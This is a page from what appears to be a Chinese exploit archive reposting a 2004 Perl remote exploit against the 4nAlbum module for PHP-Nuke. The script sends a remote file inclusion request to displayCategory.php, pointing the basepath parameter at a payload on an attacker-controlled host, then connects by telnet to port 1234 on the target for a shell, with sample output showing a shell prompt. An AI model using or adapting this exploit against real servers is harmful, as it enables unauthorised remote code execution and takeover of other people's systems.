首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
4nalbum module version 0.92 Remote exploit
来源:vfocus.net 作者:adil 发布时间:2004-05-08  

#!/usr/bin/perl -w
#
#-bash-2.05b$ perl 4nalb.pl -t 192.168.1.10 -d nuke
#Usage: perl 4nalb.pl -t <target> -d <directory>
#Remote Exploit 4nAlbum by adil@ccc.ma & alaa_eddine83@hotmail.com
#############################
# Moroccan Security Radar
# CCC MAROC 2004
#############################
#Target: 192.168.1.10
#Directory: nuke
#++++++++++++++++++++++++++++++++++++++++++++++++
#Vuln - Vuln - 3 - 2 - 1 ------
#connected
#Trying 192.168.1.10...
#Connected to 192.168.1.10.
#Escape character is '^]'.
#sh-2.05b$


require LWP::UserAgent;
use Getopt::Std;

getopts('t:d:');
our($opt_t, $opt_d);


my $target = $opt_t;
my $dir = $opt_d;


print "Usage: perl 4nalb.pl -t <target> -d <directory>\n\n";
print "Remote Exploit 4nAlbum by adil At ccc.ma & alaa_eddine83 At hotmail.com\n";
print "#############################\n";
print " Moroccan Security Radar\n";
print " CCC MAROC 2004 \n";
print "#############################\n";
print "Target: $target\n";
print "Directory: $dir\n";


my $ua = LWP::UserAgent->new;
$ua->agent("Linux");
$ua->timeout(10);
$ua->env_proxy;

$req = "http://$target/$dir/modules/4nAlbum/public/displayCategory.php?basepath=http://www.attaker.com/inject.txt?&cmd=";

my $response = $ua->get($req);
print "++++++++++++++++++++++++++++++++++++++++++++++++\n";

if ($response->is_success) {
print "Vuln - Vuln - 3 - 2 - 1 ------\n";
print "connected\n";
sleep(3);
exec("telnet $target 1234");
} else {
die $response->status_line;
}

print "++++++++++++++++++++++++++++++++++++++++++++++++++\n";

# EOF


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Titan FTP Server Aborted LIST
·Exim Buffer Overflows
·autoRST - Automated TCP RST Ex
·sendmail 8.12.9 local root exp
·Squirrelmail Local Root Chpass
·MyWeb 3.3 Buffer Overflow Expl
·X-Chat socks-5 remote buffer o
·Eudora file URL buffer overflo
·LHa Local Stack Overflow Proof
·Pound <=1.5 remote format s
·dameware generate key program
·Monit 4.1 Remote Buffer Overru
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved